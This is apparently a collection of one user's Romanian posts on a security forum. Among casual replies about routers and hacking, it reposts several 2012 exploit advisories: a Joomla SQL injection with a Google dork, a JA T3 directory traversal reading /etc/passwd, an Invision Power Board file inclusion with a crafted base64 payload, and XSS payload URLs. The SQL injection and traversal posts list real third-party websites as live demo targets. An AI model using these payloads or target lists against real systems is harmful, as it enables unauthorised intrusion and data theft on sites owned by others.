backdoor

Sa vezi ce fumos se vor clona carduri RFID , mai ales pe la institutille publice pe unde accesul este restrictionat cu card

h05th in primul rand ma bucur ca ai lasat niste prosti fara conturi de gmail. in al doilea rand tinand seama ca asta e un site cu PR1 , poti sa fii convins ca deja pagina e indexata si s-au aprins niste beculete la google. Google search: site:rstforums.com 70441-niste-mailuri-cu-parola.rst

Si ce treaba are iframe cu php ?

gacyhouse 1. o metoda mai simpla ar fi sa nu mai folosesti messenger . 2. oare de ce te injura ? 3. ai putea sa folosesti metoda lui "vipul666"

Pe sistemul , intrati voi ca sa invat si eu cateva comenzi In primul rand mai djiolau , te-ai gandit si tu sa pui niste parole calumea, ca alea chiar bat la ochi. :) In al doilea rand , daca nu-s ale tale , nu ti se pare nimic ciudat ?

Mai exact ne dai lista de ip-uri care au portul TCP 3389 deschis ?

Eh si daca da peste tine ce ? suntem destui in tara asta

Salut, Din pacate asemenea device o sa il gasesti doar in corporate si foarte probabil sa fie ip public. Mai mult de atat lumea se fereste de produce Cisco pe parte de VOIP pt ca merg doar cu telefoanele lor deoarece au un protocol de SIP proprietar.

Nice , sunt curios cate ore trebuie sa stai logat ca sa intre un admin sa apeleze "su", Si daca se logheaza direct cu root ? Am sa il testez si eu pe alte os'uri cand oi avea oleak de timp.

Lasand la o parte puterea chinei , si consecintele economice , eu zic ca tinand seama ca mai bine de jumatate din ipv4 ale APNIC sunt alocate chinei , va dati seama cate mii de servere sunt pe acolo... Multe dintre ele probabil inca mai ruleaza redhat 5 si sunt compromise. Cum multi folosesc proxy sa se anonimizeze in Romania , la fel de bine ar fi putut hackerii chinezi sa foloseasca proxy din Europa sau Africa. Eu nu cred ca guvernul chinez risca un razboi IT sau de orice alt fel din considerente bine de inteles: Americanii vor gasi un motiv sa dea cu bomba si vor bate pe la usile EU pentru eliminarea chinezilor de pe piata Europeana, pe care ei abia incep sa o exploateze cu adevarat. Motiv pt ca nu cred ca ar risca un conflict (daca este vorba de guvern). Revening la numarul mare de echipamente IT din china, sunt convins ca sunt persoane inclusiv pe acest forum care au un root pe servere .cn, deci nu e mare lucru sa fie mana europeana.

Da, chiar voiam sa postez eu asta ca am citit de curand si mi s-a ridicat parul pe spate , cat de dobitoci pot fi aia de au scris driverul. O masura de securitate pentru detinatori pana apare un update de firmware pt routerele in cauza.... Dezactivati uPNP si folositi port forward pentru aplicatiile care chiar au nevoie . ex torents , remote desktop. Distractie placuta. PS: Din pacate exploitul nu a fost facut public...

BRAVO ! DD-wrt are proceduri de recuperare destul de ok. Dar in cazul tau cred ca era mort de-a binelea. Vezi ca am reparat un DLINK fara cablu serial . Nu imi mai aduc aminte exact modelul si prodedura ,dar tin minte cam trebuie sa pui cablu de ethernet pe wan port , setai ip 10.10.x.x si te connectai pe web la el dupa ce ii dadeai un reset. Intradevar m-am chinuit un pic pt ca nu intelegeam de ce pwla mea nu raspunde la ping mizeria. Pe web aveam un file upload form cu un submit button. Am luat firmware original de la Dlink si l-am rescris.

Graphic Da nu e o idee buna sa faci asa ceve pe un monitor care functioneaza perfect din urmatoarele motive. 1. Nu poti controla luminozitatea , convertoarele de la monitoare cu tub fluorescent ridica tensiunea la cateva sute de volti (nu am masurat niciodata) dar stiu sigur ca te frige tare cand pui mana acidental pe acolo. 2. Dupa cum vezi in clip , imaginea e putin rosiatica , pt ca probabil banda aia scoate o lumina galbuie/albastruie in loc de una alba. 3. Dupa cum a zis si danny.bv , foarte proababil sa ai probleme serioase cu dispersia luminii si sa vezi niste dare pe ecran... 4.Demontarea ecranului si montarea lui fara al ciobi nu este o operatie usoara . Daca chiar vrei sa repari monotorul , te duci la un service de calculatoare si ceri un ecran de laptop cu diagonala monitorului tau si ii schimbi lampa. mai mult de 20 lei nu merita sa dai pe el .

Nice ! Thanks for sharing ! I will take a look @ it ! For those who don't know libevent is a mature library used in allot of well known applications like : ntp , memcahched , TOR, SCANssh and many others.

io.kent - De ce ai ascunde o cheie in registry ? 1. de ex pt /HKEy_LOCAL_MACHINE/USER/Curent.../run exista msconfig pe care il stie toata lumea. 2. exista programe de monitorizare pt registry. 3. daca ai ceva de stocat poti sa o faci in ini file in directorul in care e instalat / rulezi programul. Daca informatia respectiva este sensibila poti sa o encriptezi cu base64_encode(AES_encode($info,$key)); daca iti place tie Visual Basic si vrei sa faci un exercitiu . OK Oricum pt programelul tau ai nevoie de VB runtime instalat , incearca sa il rulezi pe un XP clean (pe care nu ai pus VB).

Acum serios , Ce vulnerabilitate are ? RFI ? CHIAR M-AI FACUT CURIOS !

Stai tu linistit, asta e doar ca sa fie un pic mai frustrant pt sysadmin. De decodat se poate decoda orice ai zice tu. Toate sunt bazate pe eval si base64_decode. Crezi ca nu merge facut un wrapper peste ele sau poate nu ai auzit de Xdebug - Debugger and Profiler Tool for PHP PS: Ma bucur ca postezi , dar cine il foloseste trebuie sa fie constient ca ce pune el acolo nu e indecriptabil. Macar nu va puneti id-uri de messenger

Info: 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 3 3 3 _ __ __ ________ __ __ 3 7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7 1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1 3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3 3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3 7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7 1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1 3 >> Exploit database separated by exploit 3 3 type (local, remote, DoS, etc.) 3 7 7 1 [+] Site : 1337db.com 1 3 [+] Support e-mail : submit[at]1337db.com 3 3 3 7 ########################################### 7 1 I'm E1nzte1N 1337 Member from 1337 DataBase 1 3 ########################################### 3 3 3 7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7 ============================================================= -={ Joomla Module (mod_ccnewsletter) Sql Injection Vulnerablity }=- ============================================================= ######################################################################################################## # Exploit Title : Joomla Module (mod_ccnewsletter) Sql Injection Vulnerablity # Software Link : http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,4197.html # Version : 1.0.7 # Date : 23/04/2012 # Author : E1nzte1N # E-mail : bluescreenfx@gmail.com # Category : webapps # Google dork : inurl:/modules/mod_ccnewsletter/helper/popup.php # Tested on : Windows ######################################################################################################## #Exploit/p0c : http://localhost/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] ######################################################################################################## Bug on file popup.php, in line >>$content_id = JRequest::getVar( 'id', '', 'get', 'string'); ======================================================================================================== if(!isset($mainframe)) $mainframe =& JFactory::getApplication('site'); $db =& JFactory::getDBO(); $content_id = JRequest::getVar( 'id', '', 'get', 'string'); <<= request string value "id" without filtering. $query = 'SELECT * FROM #__content WHERE id ='.$content_id; $db->setQuery( $query ); $row = $db->loadObject(); ========================================================================================================= # Demo Sites : => http://www.trirunners.com/modules/mod_ccnewsletter/helper/popup.php?id=71' => http://www.valdesi.eu/modules/mod_ccnewsletter/helper/popup.php?id=109' => http://www.kvalis.com/modules/mod_ccnewsletter/helper/popup.php?id=588' => http://www.fanticostruzioni.com/modules/mod_ccnewsletter/helper/popup.php?id=6' => http://www.cd-dvd-klastor.com/modules/mod_ccnewsletter/helper/popup.php?id=63' ######################################################################################################## ==>> Special Thanks <<== ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ] , And All Inj3ct0r Fans & All Hacktivist,,, ############################################################################ [ Me @ SRAGEN, Bumi Sukowati, 23 April 2012 @ 13:47 PM. ] [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de | Hacker-Newbie ] ############################################################################ # 1337day.com [2012-04-23] Sursa :Joomla CCNewsLetter 1.0.7 SQL Injection ? Packet Storm

Banuiesc ca asta e una din sursele multor BSOD despre care am mai citit pe internet in ultima vreme...

Merita sa incerci , Eu sunt convins ca nu o sa reusesti : Yahoo! Account Help | - SLN2051 - My password is not working

Info [waraxe-2012-SA#086] - Local File Inclusion in Invision Power Board 3.3.0 =============================================================================== Author: Janek Vind "waraxe" Date: 12. April 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-86.html CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2226 Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an Internet forum software produced by Invision Power Services, Inc. It is written in PHP and primarily uses MySQL as a database management system, although support for other database engines is available. Vulnerable versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Affected are Invision Power Board versions 3.3.0 and 3.2.3, older versions may be vulnerable as well. ############################################################################### 1. Local File Inclusion in "like.php" function "_unsubscribe" ############################################################################### CVE Information: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2012-2226 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. Vulnerability Details: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reason: using unsanitized user submitted data for file operations Attack vector: user submitted GET parameter "key" Preconditions: 1. attacker must be logged in as valid user 2. PHP must be < 5.3.4 for null-byte attacks to work Result: remote file disclosure, php remote code execution Source code snippet from vulnerable script "like.php": -----------------[ source code start ]--------------------------------- protected function _unsubscribe() { /* Fetch data */ $key = trim( IPSText::base64_decode_urlSafe( $this->request['key'] ) ); list( $app, $area, $relId, $likeMemberId, $memberId, $email ) = explode( ';', $key ); /* Member? */ if ( ! $this->memberData['member_id'] ) { $this->registry->output->showError( 'no_permission', 'pcgl-1' ); } if ( ! $app || ! $area || ! $relId ) { $this->registry->output->showError( 'no_permission', 'pcgl-1' ); } if ( ( $memberId != $likeMemberId ) || ( $memberId != $this->memberData['member_id'] ) ) { $this->registry->output->showError( 'no_permission', 'pcgl-2' ); } if ( $email != $this->memberData['email'] ) { $this->registry->output->showError( 'no_permission', 'pcgl-3' ); } /* Think we're safe... */ $this->_like = classes_like::bootstrap( $app, $area ); -----------------[ source code end ]----------------------------------- As seen above, user submitted parameter "key" is first base64 decoded and then splitted to six variables. After multiple checks function "bootstrap()" is called, using unvalidated user submitted data for arguments. Source code snippet from vulnerable script "composite.php": -----------------[ source code start ]--------------------------------- static public function bootstrap( $app=null, $area=null ) { .. if( $area != 'default' ) { $_file = IPSLib::getAppDir( $app ) . '/extensions/like/' . $area . '.php'; .. } .. if ( ! is_file( $_file ) ) { .. throw new Exception( "No like class available for $app - $area" ); .. } .. $classToLoad = IPSLib::loadLibrary( $_file, $_class, $app ); -----------------[ source code end ]----------------------------------- We can see, that variable "$_file" is composed using unvalidated argument "area". Next there is check for file existence and in case of success next function, "loadLibrary", is called, using unvalidated argument "$_file". Source code snippet from vulnerable script "core.php": -----------------[ source code start ]--------------------------------- static public function loadLibrary( $filePath, $className, $app='core' ) { /* Get the class */ if ( $filePath != '' ) { require_once( $filePath );/*noLibHook*/ } -----------------[ source code end ]----------------------------------- As seen above, "require_once" function is used with unvalidated argument. Test: we need to construct specific base64 encoded payload. First, semicolon-separated string: forums;/../../test;1;1;1;come2waraxe@yahoo.com Email address and other components must be valid for successful test. After base64 encoding: Zm9ydW1zOy8uLi8uLi90ZXN0OzE7MTsxO2NvbWUyd2FyYXhlQHlhaG9vLmNvbQ Now let's log in as valid user and then issue GET request: http://localhost/ipb330/index.php?app=core&module=global&section=like &do=unsubscribe&key=Zm9ydW1zOy8uLi8uLi90ZXN0OzE7MTsxO2NvbWUyd2FyYXhlQHlhaG9vLmNvbQ Result: Fatal error: Uncaught exception 'Exception' with message 'No like class available for forums - /../../test' in C:\apache_www\ipb330\admin\sources\classes\like\composite.php:333 Stack trace: #0 C:\apache_www\ipb330\admin\applications\core\modules_public\global\like.php(131): classes_like::bootstrap('forums', '/../../test') #1 C:\apache_www\ipb330\admin\applications\core\modules_public\global\like.php(44): public_core_global_like->_unsubscribe() #2 C:\apache_www\ipb330\admin\sources\base\ipsController.php(306): public_core_global_like->doExecute(Object(ipsRegistry)) #3 C:\apache_www\ipb330\admin\sources\base\ipsController.php(120): ipsCommand->execute(Object(ipsRegistry)) #4 C:\apache_www\ipb330\admin\sources\base\ipsController.php(65): ipsController->handleRequest() #5 C:\apache_www\ipb330\index.php(26): ipsController::run() #6 {main} thrown in C:\apache_www\ipb330\admin\sources\classes\like\composite.php on line 333 Potential attack scenario: 1. Attacker registers to target forum and logs in as valid user 2. Attacker uploads avatar picture with malicious php code to target server 3. Attacker issues carefully crafted GET or POST request and as result gets php level access There are many other ways to exploit LFI (Local File Inclusion) vulnerabilities, for example by using procfs ("proc/self/environ") on *nix platforms. How to fix: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Update to new version 3.3.1 http://community.invisionpower.com/topic/360518-ipboard-331-ipblog-252-ipseo-152-and-updates-for-ipboard-32x-ipgallery-42x-released/ Disclosure Timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 27.03.2012 Developers contacted via email 28.03.2012 Developers confirmed upcoming patch 11.04.2012 Developers announced new version release 12.04.2012 Advisory released Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------ Sursa: Comments ? Packet Storm

Info ======================================================================= Joomla template JA T3-Framework Directory Traversal Vulnerability 0-Day ======================================================================= # Vendor: hhttp://extensions.joomla.fr/extensions/index-des-extensions-fr/1788-Templates/4151-ja-t3-framework-joomla-15 # Date: 2012-4-2 # Author : indoushka # Tested on : Ubuntu Linux 9.10 ######################################################## # Dork : inurl:/index.php?jat3action= # Demo : http://www.maxim-tours.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 http://www.taqadoumy.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 http://iraneconomist.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 http://yxact.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 http://www.rtmcsumut.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 http://news.lk/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 http://www.guiaenarm.net/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 http://britanskie-kotiki.ru/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 http://profidom.com.ua/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 ------------- http://localhost/jojo/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 ****************************************************** Sursa : Joomla JA T3-Framework Directory Traversal ? Packet Storm

Info 1. OVERVIEW Beatz 1.x versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Beatz is a set of powerful Social Networking Script Joomla! 1.5 plugins that allows you to start your own favourite artist band website. Although it is just a Joomla! plugin, it comes with full Joolma! bundle for ease of use and installation. 3. VULNERABILITY DESCRIPTION Multiple parameters were not properly sanitized upon submission, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. The vulnerable plugins include: com_find, com_charts and com_videos. 4. VERSIONS AFFECTED Tested in 1.x versions 5. PROOF-OF-CONCEPT/EXPLOIT == Generic Joomla! 1.5 Double Encoding XSS http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1 == com_charts (parameter: do) http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts == com_find (parameter: keyword) http://localhost/beatz/index.php?do=listAll&keyword=++Search"><img+src=0+onerror=prompt(/XSS/)>&option=com_find == com_videos (parameter: video_keyword) http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search 6. SOLUTION The vendor hasn't released the fixed yet. 7. VENDOR Cogzidel Technologies Pvt Ltd. http://www.cogzidel.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-03-01: notified vendor 2012-04-15: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss #yehg [2012-04-15] Sursa : Joomla Beatz 1.x Cross Site Scripting ? Packet Storm

Firewall based ACL rezolva problema asta.